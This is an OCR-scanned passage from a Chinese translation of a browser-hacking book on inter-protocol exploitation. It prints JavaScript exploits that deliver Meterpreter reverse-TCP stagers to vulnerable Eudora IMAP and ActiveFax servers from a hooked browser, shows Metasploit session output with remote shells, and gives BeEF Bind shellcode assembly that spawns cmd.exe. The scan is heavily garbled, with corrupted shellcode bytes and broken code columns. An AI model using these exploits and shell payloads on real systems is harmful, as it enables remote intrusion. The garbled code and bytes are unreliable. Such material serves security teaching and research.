"\x97\xde\x27\x6f£\xf2\xd0\x18\x8f£\xfd\x3a\x31\x25\x07\xad" 
"\xK92\xa9\x22\xK2cC\K83\xcb\x2c\x09\x5c\x42\xca\x3£\x72\x02" 
"\x44\xa8\xeb\x0f\xle\x49\xf3\x9a\x5a\x49\x7£\xK28\x9a\x04" 
"\x88\x45\x88\xf1\x78\x10\xf2\x54\x86\x8f\x99\x58\x12\x2b" 
"\x08\x0e\x8a\x31\x6d\x78\x15\xca\x58\xf2\x9c\x5e\x23\x6d" 
"\xel\x8e\xa3\x6d\xb7\xc4\xa3\x05\x6f\xbc\xf£7\x30\x70\x69" 
"\x64\xe9\xe5\x91\xdd\x5d\xad\xf£9\xe3\xb8\x99\xa6\xlc\xef" 
"\xlb\x9b\xca\xd6\x99\xed\x78\x3b\x62" 


根据 之 前 计算 的 HTTP 首 部 ， 需 要 考虑 的 字 节 是 426 字 节 。 另 外 还 提前 计算 了 Shellcode 的 总 大 
小 为 769 字 节 。 这 说 明 有 充足 的 空间 使 用 Meterpreter Stager payload。 不 过 ， 还 是 需要 根据 可 用 空 
间 动 态 调整 NOP， 否 则 Shellcode 就 不 会 被 加 载 到 内 存 中 适当 的 位 置 。 

可 以 使 用 以 下 JavaScript 代 码 ， 将 Stager 发 送 给 目标 IMAP 服 务 ， 当 然 首先 得 计算 出 总 共 可 用 
的 空间 和 HTTP 首 部 的 大 小 : 


var stager = "B33FB33F" + 

"\xda\xdf\xd9\x74\x24\xf4\xbe\xba\xeb\xc6\xfc\x5a\x29\xc9" 
"\xb1\x49\x83\xea\xfc\x31\x72\x15\x03\x72\x15\x58\xle\x3a" 
"\x14\x15\xel\xc3\xe5\x45\x6b\x26\xd4\x57\x0£\x22\x45\x67" 
"\x5b\x66\x66\x0C\x09\x93\xfd\x60\x86\x94\xb6\xce\xf0\x9b" 
"\x47\xf£\x3c\x77\x8b\x9e\xc0\x8a\xd8\x40\xf8\x44\x2d\x81" 
"\x3d\xb8\xde\xd3\x96\xb6\x4d\xc3\x93\x8b\x4d\xe2\x73\x80" 
"\xee\x9c\xf6\x57\x9a\x16\xf8\x87\x33\x2d\xb2\x3£\x3£\x69" 
"\x63\x41\xec\x6a\x5£\x08\x99\x58\x2b\x8b\x4b\x91\xd4\xbd" 
"\xb3\x7d\xeb\x71\x3e\x7c\x2b\xb5\xal\x0b\x47\xc5\x5c\x0b" 
"\x9c\xb7\xba\x9e\x01\x1lf£\x48\x38\xe2\xal\x9d\xde\x61\xad" 








二 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 十 











二 十 十 十 十 十 十 十 十 十 
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"\x6a\x95\x2e\xb2\x6d\x7a\x45\xce\xe6\x7d\x8a\x46\xbc\x59" 
"\x0e\x02\x66\xc0\x17\xee\xc9\xfd\x48\x56\xb5\x5b\x02\x75" 
"\xa2\xdd\x49\x12\x07\xd3\x71\xe2\x0f£\x64\x01\xd0\x90\xde" 
"\x8d\x58\x58\x£8\x4a\x9e\x73\xbe\xc5\x61\x7c\xbc\xcc\xa5" 
"\x%28\xec\x66\x0f£\x51\x67\x77\xb0\x84\x27\x27\xle\x77\x87" 
"\x97\xde\x27\x6f\xf2\xd0\x18\x8f£\xfd\x3a\x31\x25\x07\xad" 
"\x92\xa9\x22\xK2c\x83\xcb\x2c\x09\x5c\x42\xca\x3£\x72\x02" 
"\x44\xa8\xeb\x0f\xle\x49\xf3\x9a\x5a\x49\x7£\xK28\x9a\x04" 
"\x88\x45\x88\xf1\x78\x10\xf2\x54\x86\x8f\x99\x58\x12\x2b" 
"\x08\x0e\x8a\x31\x6d\x78\x15\xca\x58\x£2\x9c\x5e\x23\x6d" 
"\xel\x8e\xa3\x6d\xb7\xc4\xa3\x05\x6f\xbc\xf£7\x30\x70\x69" 
"\x64\xe9\xe5\x91\xdd\x5d\xad\xf9\xe3\xb8\x99\xa6\xlc\xef" 
"\x1lb\x9b\xca\xd6\x99\xed\x78\x3b\x62"; 


t+ t+ t+ tte eet ttt 


/* 

* Egg Hunter (Skape's NtDisplayString technique). 

* Original size: 32 bytes 

"mA 
var egg hunter - 
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" + 
"\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"; 


var next_seh = "\xeb\x06\x90\x90"; 
var seh = "\x4e\x3b\x01\x10"; // POP ECX mailcmn.dll 
gen_nops = function(count) { 
var i = 0; 
Var result = T"; 
while(i < count ){ result += "\x90";i++;} 
log("gen_nops: generated " + result.length + " nops."); 


return result; 


un 


var available space - 769; 

var headers size - 423; 

// 要 生成 的 NOP 字 节 数 

var junk = available_space - stager.length - headers_size; 
var junk data = gen nops (junk); 


// 最 后 的 shellcode 
var payload = junk_data + stager + next_seh + seh + egg_hunter; 


var url = “http://172.16.37.151:143/"; 

var xhr = new XMLHttpRequest (); 

// 为 了 基于 WebKit 的 浏览 器 

if (!XMLHttpRequest.prototype.sendAsBinary) { 

XMLHttpRequest .prototype.sendAsBinary = function (sData) { 
var nBytes = sData.length, ui8Data = new Uint8Array (nBytes) ; 
for (var nIdx = 0; nIdx < nBytes; nIdx++) { 

ui8Data[nIdx] = sData.charCodeAt(nIdx) & Oxff; 
} 
/* send as ArrayBufferView...: */ 
this.send(ui8Data) ; 
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xhr.open("POST", url, true); 
xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 


var post body = "a001 LIST " + "}" + payload + "Jj" + "\r\n"; 
xhr.sendAsBinary (post, body); 


运行 以 上 代码 ， 一 个 POST 请 求 就 会 被 发 送 到 有 漏洞 的 Eudora IMAP ARS Ws Wr (1172.16.37. 
151:143 端 口 ， 如 图 10-21 所 示 。 


Y POST http://172.16.37.151:143/ 200 OK 8ms basic.html (line 345) 
Headers Post XML 


Source 


a001 LIST }B33FB33FUBRUtS6%2é6RUZ ) EtIfétilrrx: AAAEk&OW"EG([ ff “9 +" 116) Gy<w 
«ZASQ6oD-- , PO—IMA” .Más€ieOWSot3-222icAlj "X*(K'ÓA3)8q»|*u1GÀNe- 9ZH881paj* . 2mzEfe}SFxYfAi 
EyHVy[ ut f1Ógq&dDPXXoJZskÀa |X1v(1fQgw",' wi—b'oODf:1$'O",fE, VABÉ?rD'8IÓBZI(ÀB^E^füxoT 
t*X*S1mxÉXóc^fmáZ£m- A£oX-0pidéà'$]uà,"|1:)f£Ó"ix;b8N;fÉyBRjXÍ.«Zti,B33F.ü ué"ugyg) 

















图 10-21 Firefox 浏 览 器 发 送 的 利用 Stager 


因为 指定 的 是 一 个 reverse_tcp Meterpreter payload， 所 以 需要 在 发 送 这 个 请 求 之 前 先 绑 定 
一 个 反弹 连接 。 这 一 步 是 必需 的 ， 因 为 处 理 程序 在 接收 到 目标 的 反弹 连接 时 , 需要 把 接收 到 的 信 
息 返 回 给 Meterpreter Stage. 

整个 利用 的 最 终结 果 如 图 10-22 所 示 。 























msf exploitChandler) > exploit 


Started reverse handler on 172.16.37.1:9999 

Starting the payload handler... 

Sending stage (751104 bytes) to 172.16.37.151 

Meterpreter session 1 opened (172.16.37.1:9999 -> 172.16.37.151:1352) 


(C) Copyright 1985-2001 Microsoft Corp. 


(C: NNINDOWSNsystem32»netstat -na 
netstat -na 


Active Connections 


Proto Local Address 
TCP 
TCP 
TCP 
TCP 
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图 10-22 ”与 被 控制 的 IMAP 服 务 器 交互 
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如 图 10-22 中 的 netstat 命 令 所 示 ， 我 们 现在 可 以 与 目标 系统 交互 了 。 

(4) ActiveFax 协 议 间 利 用 的 例子 

ActiveFax 是 Windows 平 台 上 流行 的 传真 解决 方案 , 在 内 部 网 络 中 很 常见 。Craig Freyman 发 现 
了 ”其 RAW 服务 器 组 件 (5.01 及 以 下 版 本 ) 处 理 的 一 个 命令 中 存在 缓冲 区 溢出 漏洞 。 

ActiveFax 可 以 让 用 户 使 用 LPD RAW 和 FTP 协 议 发 送 和 接收 传真 .其 中 RAW 服务 器 接收 TCP 
数据 包 ， 并 处 理 包含 在 aeFx 和 8e 定 界 符 之 间 与 传真 相关 的 内 容 ，eFx 是 该 协议 能 理解 的 一 个 特殊 
命令 。 

RAW 服务 器 组 件 可 以 被 绑 定 到 任何 TCP 端 口 ， 其 用 户 手册 (第 112 页 ) 建议 “使 用 端口 3000， 
这 个 端口 没有 被 浏览 器 封禁 。 事 实 上 ，RAW 服 务 器 组 件 还 使 用 了 一 个 容错 协议 。LPD 和 FTP 同 样 
也 容错 ， 前 面 都 讨论 过 了 ， 但 它们 使 用 的 端口 却 是 被 封禁 的 。 这 也 是 我 们 会 考虑 RAW 服务 器 组 



































件 的 原因 。 
缓冲 区 溢出 的 条 件 存 在 于 eF506 命 令 , 该 命令 负责 以 特定 文件 格式 和 分 状 率 输出 传真 。 比如 ， 
@F506 pdf,150@ 就 是 一 个 合法 的 命令 ， 表 示 输 出 分 状 率 为 150 的 PDF 传 真 。 





利用 这 个 缓冲 区 溢出 比 通常 的 情况 要 复杂 一 点 ,因为 留 给 Shellcode 的 可 用 空间 并 不 连续 。 此 
外 ， 还 需要 对 Shellcode 进 行 编 码 ， 以 删除 问题 字符 。 比 如 ， 从 \x00 到 \x1f 的 字符 都 必须 删除 ， 
包括 \x40( 8@ )， 因 为 它 用 于 表示 命令 的 前 级 和 后 级 。Metasploit 的 alpha_mixed 编 码 右 做 这 件 事 
很 合适 ,但 就 是 输出 的 Shellcode 会 增 大 一 些 。 

下 面 的 代码 可 以 在 勾 连 浏览 絮 中 运行 ， 运 行 后 会 将 Meterpreter Stager 注 和 内存 ， 从 而 利用 我 
们 说 的 缓冲 区 溢出 漏洞 : 

var target = "http://172.16.37.151"; 


var port = 3000; 
var xhr = null; 




















// Meterpreter reverse_tcp stager 
// W3#%172.16.37.1:4444 

// VAx86/alpha_mixed#YZ 

var stager = 
"\x89\xe2\xda[...snip...]"; 


// jmp esp in ole32.dll - Win XP SP3 English 


var eip = '\x77\x9c\x55\x77'; 
// E 
var adjust = '\x81\xc4\x24\xfa\xff\xff'; 


var shellcode chunk 1 
var shellcode chunk 2 


= stager.slice(0,554); 
= stager.slice(554, stager.length); 
function genJunk(c, length) { 
var temp = ""; 
for(var i=0;i<length;i++) { 
temp += C; 
} 


return temp; 
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var fill = genJunk("\x42", (1024 - shellcode_chunk_2.length) ); 


function sendRequest (port, data) { 
xhr = new XMLHttpRequest (); 
// 对 WebKit 浏 览 器 
var url = target + ":"+ port; 
if (!XMLHttpRequest.prototype.sendAsBinary) { 
XMLHttpRequest .prototype.sendAsBinary = function (sData) { 
var nBytes = sData.length, ui8Data = 
new Uint8Array (nBytes) ; 
for (var nIdx = 0; nIdx < nBytes; nIdx++) { 
ui8Data[nIdx] = sData.charCodeAt (nIdx) & Oxff; 
} 
/* Rik ArrayBufferView...: */ 
this.send(ui8Data) ; 


xhr.open("POST", url, true); 


xhr.setRequestHeader("Content-Type", "text/plain"); 
xhr.setRequestHeader('Accept','*/*'); 
xhr.setRequestHeader("Accept-Language", "en"); 


xhr.sendAsBinary (data); 


) 


// 最 终 的 利用 代码 
var payload = shellcode_chunk_2 + fill + 
eip + adjust + shellcode chunk 1; 


var stager request = "@F506 " + payload + "@\r\n\r\n"; 
sendRequest (port, stager request); 


setTimeout (function() { 
xhr.abort (); 
), 2000); 


RAW 服务 器 默认 的 套 接 字 超时 为 60 秒 ， 而 Shellcode 只 能 在 连接 断 开 时 执行 。 

如 果 你 使 用 Ruby 编 写 利 用 代码 , 并 且 可 以 直接 连接 该 套 接 字 , 那 要 断 开 连接 就 容易 了 。 可 是 
Aer. 我 们 是 要 通过 色 连 浏览 器 来 做 这 件 事 。 别 发 愁 ， 使 用 XMLHttpRequest 的 abort () 方 法 
也 能 达到 类 似 的 效果 。 发 送 数据 几 秘 钟 之 后 就 中 断 XHR 调 用 会 导致 Shellcode 执 行 ， 而 不 需要 等 
待 RAW 服务 器 断 开 连接 。 

运行 前 面 代码 的 结果 如 图 10-23 所 示 。 
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2r < "| Console- HTML CSS Script DOM Net Cookies 


è Clear Persist Profile (7/9 Errors Warnings Info Debug Info Cookies 
Knr.apDorc(]; Fr ZUUUTJT7 
Y POST http://172.16.37.151:3000/ Aborted 1.99s 


Headers Post 





Source 


@F506 8Unk06azaPPhgpVp7p5P0VazWpQxchOT1CkUI09Ez363CZ7pbvpSqGu8gryI Zh30yoxU7qZc4io 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
GUwASyye-AÜ0AUroó]UYIIIIIIIIIICCCCCC7QZjAXPOA0AkAAQ2AB2BBÜBBABXPBABuJIKLHhMYgpS030e 
kaB4LlKCbftNk3BThtOOGszq6PlioFQ9PLlgLSQCLFbtl7P9QZoDMvahGirB8paBf7lKPRTPLKRbulgqNO 
OlKCxDXlKrx1031KcysElcyLKednk7qKfUaioVQKpNLzaJoVmUQxGfXkP45xt33qmIhgKamGTPuJBv8nk 
HuLS1HSNkgtNkFaXPk9rd4dl4qKsk51V9cj3aYoIpQHqOCjnktRhklFcmphTsFRGpwpcXpwsC5bSocdSX 
PcOdizdV4V0ax6lIk00kS090juVOrpvObpcp2pqPV03X9zvoYOypyoZuLWQzC5u8NLr0q5uQaxtBePGaSl: 
e 








Sending stage 48 bytes) to 1 1 
Meterpreter session 2 opened (172.16.37.1:4444 -> 172.16.37.151:1180) at 2013-10-17 14:16:20 +0100 


meterpreter » sysinfo 
Seded : ANONYMOUS 
: Windows XP (Build 2600, Service Pack 3). 
Architects : x86 
System Language : en_US 
Meterpreter : x86/win32 
meterpreter > 








HY 


图 10-23 ”与 被 控制 的 ActiveFax 服 务 器 交互 


MONA 


Peter Van Eeckhoutte 和 Corelan 团 队 编 写 并 维护 着 mona.py“,， 它 是 一 个 Immunity/WinDBG 调 
试 器 插件 。Mona 非 常 好 用 ， 因 为 它 把 漏洞 研究 和 利用 过 程 中 的 很 多 (烦琐 的 ) 任务 自动 化 了 。 
如 果 没 有 Mona， 像 检测 自 定 义 协 议 中 的 问题 字符 之 类 的 活 ， 干 起 来 可是 非常 没意思 的 。 

举 个 例子 ， 如 果 在 前 面 ActiveFax 的 代码 示例 中 ， 由 于 目标 不 是 XP SP3 English， 我 们 要 修 
改 ole32.dql1 中 的 指令 JMP ESP， 那 就 可 以 用 Mona。 只 要 把 [mmunity Debugger 附 加 到 
ActiveFax， 然 后 执行 命令 1mona jmp -r esp 就 行 了 ， 产生 的 结果 如 下 所 示 ( 第 一 个 地 址 在 
利用 的 例子 中 用 过 ) 


Os 559 c S amore sion | (PAGE EXECUTE READ) [ole32.d11] 
ASLR: False, Rebase: False, SafeSEH: True, OS: True, 
v5.1.2600.6435 (C: NWINDOWSNsystem32Nole32.dl1) 





0x7755a9a8 : jmp esp | (PAGE EXECUTE READ) [0o1e32.d11] 
ASLR: False, Rebase: False, SafeSEH: True, OS: True, 
v5.1.2600.6435 (C: NWINDOWSNsystem32Nole32.dl1) 


Mona 还 有 非常 丰富 的 功能 ， 包 括 半 自动 的 Metasploit 模 板 生成 器 。 如 果 你 想 搞 漏洞 研究 或 
利用 挖 握 ， 可 以 试 试 这 个 插 T 











前 面 的 例子 使 用 的 都 是 在 /etc/hosts/ 中 映射 到 172.16.37.1 的 browserhacker.com, 因为 为 了 演示 ， 
我 们 使 用 了 VMware 虚 拟 机 。 在 实际 应 用 中 ，Metasploit 的 反弹 连接 处 理 程序 和 BeEF， 则 很 可 能 会 
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运行 在 一 个 暴露 在 公 网 的 PP 上。 换 句 话说 ,反弹 连接 会 指向 你 控制 的 机 器 ， 而 该 机 器 位 于 勾 连 浏 
览 器 所 在 内 部 网 络 的 外 面 。 图 10-24 展 示 了 整个 利用 流程 的 概况 。 





r Hi | 

| Stager 执 行 并 打开 反弹 TCP 

SN 

| S RN : 
mene Ne 


235 $ NS NS 
E 弹 TCP 连 接 处 理 程 序 Tt NI 
. NON 
(Metasploit) MMA 


NOMA NN m, 
á BS 
Metasploit 反 弹 处 理 程序 将 m K A 
Stage) [i ActiveFax 5.01 




















外 网 与 内 网 直接 通信 


通过 Shellcode Stager “FR” 


INTERNET 


INTRANET (=e 











2110-24 ”使 用 反弹 Meterpreter Shellcode 利 用 ActiveFax 漏 洞 的 流程 


可 不 要 忘 了 , 目标 内 网 中 唯一 受 你 控制 的 就 是 勾 连 浏览 器 。 内 网 外 出 流量 过 滤 系 统 可 能 会 检 
测 并 过 滤 从 内 网 服务 器 到 外 部 互联 网 主机 的 请 求 , 而 警惕 的 系统 管理 员 也 会 对 那些 并 非 从 内 部 到 
内 部 ， 而 是 从 内 部 到 一 个 未 知 外 部 系统 的 通信 睁 大 眼睛 。 

在 开始 下 一 节 之 前 ， 有 必要 想 一 想 执行 PE 攻击 必须 满足 的 几 个 条 件 。 首 先 ， 协 议 实 现 必 须 
能 够 容错 , 而 且 能 够 把 数据 封装 在 HITP 请 求 中 。 其 次 , 可 能 要 多 花 点 时 间 先 去 理解 存在 什么 HTTP 
首部 , 然后 相应 地 调整 payload 大 小 。 再 次 , 这 些 攻 击 都 假定 从 目标 的 内 部 服务 器 到 外 网 , 存在 一 
条 畅通 无 阻 的 外 出 通道 。 随 着 越 来 越 严 密 的 安全 边界 控制 方案 被 企业 部 署 到 内 网 中 , 内 部 服务 需 
可 以 使 用 任意 端口 与 外 部 网 络 对 话 的 假设 , 会 越 来 越 显 得 不 靠 谱 。 最后， 如 果 没 有 事先 进行 相当 
深度 的 侦察 ， 想 不 仅 发 现 ITPC， 而 且 发 现 ITPE 漏 洞 ， 可 没 那 么 简单 。 

尽管 我 们 已 经 介绍 过 如 何 克 服 侦察 和 发 现 可 利用 系统 时 可 能 遇 到 的 困难 , 但 对 于 前 面 第 三 个 
问题 而 言 , 这些 仍 无 济 于 事 。 如 果 出 站 访问 被 限制 了 , 那 你 怎么 从 被 控制 的 系统 向 互联 网 发 消息 ? 
接 下 来 ,我们 就 会 介绍 如 何 使 用 BeEF Bind Shellcode 来 解决 这 个 问题 。 
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10.6 ”使 用 BeEF Bind 控制 shell 


本 章 最 后 这 一 节 会 结合 前 面 讨论 的 协议 间 通 信 以 及 利用 的 知识 ， 介 绍 BeEF Bind ( Wade 
Alcom 设 想 的 一 个 概念 )。BeEF Bind 是 相对 较 小 的 绑 定 Shellcode ， 用 于 可 以 实施 IPE 攻 击 的 
Windows 和 Linux。Shellcode 背 后 的 思想 在 这 里 又 被 使 用 Java 和 PHP 重 新 实现 了 一 次 。 当 然 ， 你 可 
以 将 其 再 移植 到 其 他 语言 。 

第 9 章 讨 论 了 实践 中 如 何 对 Web 应 用 和 Java 应 用 服务 器 执行 远程 命令 攻击 。 其 中 讨论 的 很 多 
payload 都 可 以 通过 BeEF Bind payload 修 改 ， 以 实现 勾 连 浏览 器 与 被 控制 的 JBoss 、GlassFish 或 
m0n0wall 服 务 器 之 间 的 双向 通信 。 





























10.6.1 BeEF Bind Shellcode 


BeEF Bind， 顾 名 思 义 ， 就 是 一 个 绑 定 Shellcode。 意 思 就 是 它 是 一 个 小 型 分 段 Shellcode， 在 
利用 过 程 中 ， 可 以 通过 它 实 现 匀 连 浏览 器 与 被 控 系 统 间 的 双向 通信 。Shellcode 是 Ty Miller 在 2011 
年 开发 并 在 RuxCon 2012 期 间 发 布 的 。Shellcode 被 组 织 成 一 个 Stager 和 一 个 Stage。 

Stager 是 包含 在 利用 过 程 中 的 Shellcode 的 第 一 部 分 ， 只 有 最 低 限度 的 指令 ， 用 于 执行 第 二 次 
请 求 发 过 来 的 Stage。Stage 会 被 发 送 到 Stager 绑 定 的 端口 , 包含 着 最 终 要 执行 的 payload， 比 如 实现 
双向 通信 和 执行 操作 系统 命令 等 。 

BeEF Bind 之 所 以 被 分 成 两 段 , 是 因为 Stage 通 常会 非常 大 , 无 法 在 初始 利用 中 被 提交 。 当 然 ， 
后 面 发 送 的 虽然 是 BeEF Bind Stage， 但 其 实 也 可 以 发 送别 的 payload。 

Stager 可 以 解决 大 小 问题 ， 因 为 它 足够 小 ， 还 能 执行 。 它 唯一 的 用 途 就 是 为 后 面 接 收 并 执行 
更 大 的 Stage 作 铺垫 。 考 虑 到 Windows 和 Linux 平 台 的 利用 ， 我 们 接 下 来 分 别 讨论 两 个 不 同 的 BeEF 
Bind 实 现 。 

1. Win32 Stager 

初始 Stager 只 有 299 字 节 。 对 大 多 数 Windows 平 台 的 利用 而 言 ， 这 么 小 的 尺寸 是 非常 合适 的 ， 
也 为 编码 目标 协议 中 的 问题 字符 留 出 了 空间 。 

以 下 是 Stager 的 汇编 源码 ， 注 意 这 里 没有 给 出 Stephen Fewer 的 block_bingd_tcp.asm 代 码 ， 








































































































; Author: Ty Miller @ Threat Intelligence 
; Compatible: Windows 7, 2008, Vista, 

; 2003, XP, 2000, NT4 

; Version: 1.0 (2nd December 2011) 


$ 


[BITS 32] 


; INPUT: EBP is block_api. 
; by here we will have performed the bind_tcp 
connection to setup our external web socket 
%include "src/block bind tcp.asm" 
; Input: EBP must be the address of 'api call'. 
; Output: EDI will be the newly connected clients socket 
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Clobbers: EAX, 
also be modified 


EBX, ESI, 
(-0x1A0) 


EDI, ESP will 


; 








;$include "src/block virtualalloc.asm" 
; Input: None 
; Output: EAX holds pointer to the start 
; bytes, EBX has value 0x1000 
; Clobbers: EAX, EBX, ECX, EDX 
; Included here below: 
mov ebx,0x1000 ; Setup our flags 
; Alloc a buffer for the request and resp 


allocate memory: 
PAGE EXECUTE READWRITE - don't need e 


; 














push byte 0x40 
push ebx ; MEM COMMIT 
push ebx ; Size of memory to be alloc 
push byte 0 ; NULL as we don't care w 
push 0xE553A458 ; hash( "kernel3 
; VirtualAlloc( NULL, dwLength, 
H MEM COMMIT, PAGE EXECUTE READWRITE 
call ebp 
; Save pointer to buffer since eax gets 
mov esi, eax 
; Receive the web request containing the 
recv: 
push byte 0 ; flags 
push ebx ; allocated space for stag 
push eax ; Start of our allocated c 
push edi ; external socket 
push 0x5FC8D902 ; hash( "ws2 32.dll", 
call ebp ; recv( external socket, 
close handle: 
push edi ; hObject: external socket 
push 0x528796C6 ; hash(kernel32.d11,Cl 
call ebp ; CloseHandle 
; Search for "cmd-" in the web request fo 


find, cmd: 
cmp dword [esi], 
jz cmd, found 
inc esi ; 
jmp short find cmd 
cmd found: 


0x3d646d63 check i 
if we found "cmd=" t 
point ebx to next ch 
check next loca 
now pointing to 


; 


; 


; 


; 


; add esi,4 ; Starts off pointing at 
; (plus inc eax below) 

; this compiles to 6 

db 0x83, 0xC6, 0x04 ; add esi,4 bu 
jmp esi ; jump to our stage payload 


如 果 你 不 熟悉 
个 主要 步 又 如 下 。 


Shellcode， 可 以 参考 The Shellco 


) . 


of buffer 0x1000 


and buffer size in ebx 
onse data 


xecute but may as well 


ated (4096 bytes) 


here the allocation is 


2.d11", "VirtualAlloc" ) 


; 


clobbered 


stage 


e 
ommand space 


"recy" ) 
buffer, size, 0 ); 
oseHandle) 


r our payload 


f ebx points to "cmd-" 
hen parse the command 
ar in request data 
tion for "cmd-" 

start of our command 
"cmd=" so add 3 

to point to command 
byte opcode 

t only 3 byte opcode 








der Hacker’s Handbook, 2nd Edition, Stager 的 4 


(1) 绑 定 端口 4444/TCP ， 以 接收 参数 cmd 中 包含 原始 Stage 的 HTTP POST 请 求 。 
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(2) 这 个 请 求 被 处 理 后 ，Stager 会 在 内 存 中 搜索 字符 串 cmda= 以 查找 Stage， 检 测 EBX 寄 存 器 值 














eet 
是 否 指向 它 : 


cmp dword [esi], 0x3d646d63, 

(3) 找到 Stage 的 内 存 地 址 后 ，Stager 会 分 配 一 块 可 执行 内 存 ， 然 后 把 Stage 复 制 进 去 。 

(4) 绑 定 端口 4444/TCP 随 后 关闭 ， 并 执行 Stage。 

POST 请 求 中 的 cma 参 数 是 Stage 的 二 进 制版 本 ， 接 下 来 我 们 看 一 看 。 

2. Win32 Stage 

BeEF Bind Stage 本 质 上 是 一 个 最 小 化 的 Web 服 务 器 ， 能 够 给 出 标准 的 HTTP 响应 ， 并 添加 适 























当 的 CORS 首 部 ， 以 实现 与 勾 连 浏览 器 的 双向 通信 。 通 过 它 也 可 以 使 用 JavaScript 进 行 跨 域 通信 ， 
只 不 过 这 样 做 会 导致 Stage 变 复杂 。 








Stage 的 源码 比 Stager 多 很 多 ， 为 简短 起 见 ， 本 书 就 不 印 出 来 了 。 可 以 访问 https:/brow- 























serhacker.com, 在 里 面 能 找到 它 完 整 的 汇编 代码 。 接 下 来 , 我 们 讨论 Stage 中 几 个 最 有 意思 的 地 方 。 


以 下 代码 负责 添加 适当 的 HTTP 响应 头 , 特别 是 Access-Control-Allow-Origin: *header: 


response_headers: 


push esi ; Save pointer to start of buffer 
lea edi, [esi+1048] ; set pointer to output buffer 
call get_headers ; locate the static http response headers 


db 'HTTP/1.1 200 OK', 0x0d, 0x0a, 'Content-Type: text/html', 
0xOd,0x0a, 'Access-Control-Allow-Origin: *', Ox0d, 0x0a, 
'Content-Length: 3016', 0x0d, 0x0a, Ox0d, 0x0a 
get headers: 


pop esi ; get pointer to response headers into esi 
mov ecx, 98 ; length of http response headers 

rep movsb ; move the http headers into the buffer 
pop esi ; restore pointer to start of buffer 





在 绑 定 TCP 端 口 和 在 内 存 中 搜索 cmda- 时 ，Stager 和 Stage 共 享 了 相同 的 内 部 逻辑 。 
Stage 的 复杂 性 主要 在 执行 操作 系统 命令 的 过 程 中 ， 包 括 读 取 它 们 的 输出 ， 然 后 再 以 HTTP 响 











应 返回 结果 。 总 的 来 看 ， 有 以 下 几 个 步 又 。 








(1) 创建 OS 管道 , 以 通过 cmqa. exe 重 定向 输入 和 输出 。 这 些 管理 用 于 传输 及 后 续 执 行 OS 命 令 。 
(2) 命令 被 执行 ， 同 时 它们 的 输出 被 读 取 到 预 分 配 的 缓冲 区 中 。 

(3) 缓冲 区 中 的 输出 内 容 被 包含 在 HTTP 响 应 里 , 同时 在 响应 中 的 还 有 前 面 介绍 的 CORS 首 部 。 
(4) 客户 端 ， 在 这 里 就 是 勾 连 浏览 带 中 的 XMLHttpRequest 对 象 ， 读 取 Stage 发 过 来 的 响应 ， 








其 中 包含 content-Type: text/html， 然后 解析 响应 。 


产生 操作 系统 命令 的 Stager 代 码 如 下 : 


[BITS 32] 


; Input: 

; EBP is api_call 

; esp+00 child stdin read file descriptor (inherited) 
; esp+04 not used 

; esp+08 not used 
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; esp+12 child stdout write file descriptor (inherited) 
; Output: None. 











; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified 
shell: 
push 0x00646D63 ; push our command line: 'cmd',0 
mov ebx, esp ; Save a pointer to the command line 
push dword [esp+16] ; child stdout write file descriptor 
; for process stderr 
push dword [esp+20] ; child stdout write file descriptor 
; for process stdout 
push dword [esp+12] ; child stdin read file descriptor 
; for process stdout 
xor esi, esi ; Clear ESI for all the NULL's we need to push 
push byte 18 ; We want to place (18 * 4) = 72 null 
; bytes onto the stack 
pop ecx ; Set ECX for the loop 
push, 1oop: 
push esi ; push a null dword 


; keep looping until we have pushed enough nulls 
loop push, loop 

; Set the STARTUPINFO Structure's dwFlags 

; to STARTF USESTDHANDLES | STARTF USESHOWWINDOW 
mov word [esp + 60], 0x0101 

; Set EAX as a pointer to STARTUPINFO Structure 
lea eax, [esp + 16] 
; Set the size of the STARTUPINFO Structure 
mov byte [eax], 68 
; perform the call to CreateProcessA 

; Push the pointer to the PROCESS INFORMATION Structure 
push esp 
; Push the pointer to the STARTUPINFO Structure 
push eax 
; The lpCurrentDirectory is NULL so the new process 
; will have the same current directory as its parent 
push esi 
; The lpEnvironment is NULL so the new process will 
; have the same enviroment as its parent 











push esi 
push esi ; We don't specify any dwCreationFlags 
inc esi ; Increment ESI to be one 


; Set bInheritHandles to TRUE in order to inherit 
; all possible handles from the parent 





push esi 
dec esi ; Decrement ESI back down to zero 
push esi ; Set lpThreadAttributes to NULL 
push esi ; Set lpProcessAttributes to NULL 
push ebx ; Set the lpCommandLine to point to "cmd",0 
push esi ; Set lpApplicationName to NULL as we 
; are using the command line param instead 
; hash( "kernel32.dll", "CreateProcessA" ) 





push 0x863FCC79 
; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi ); 
call ebp 
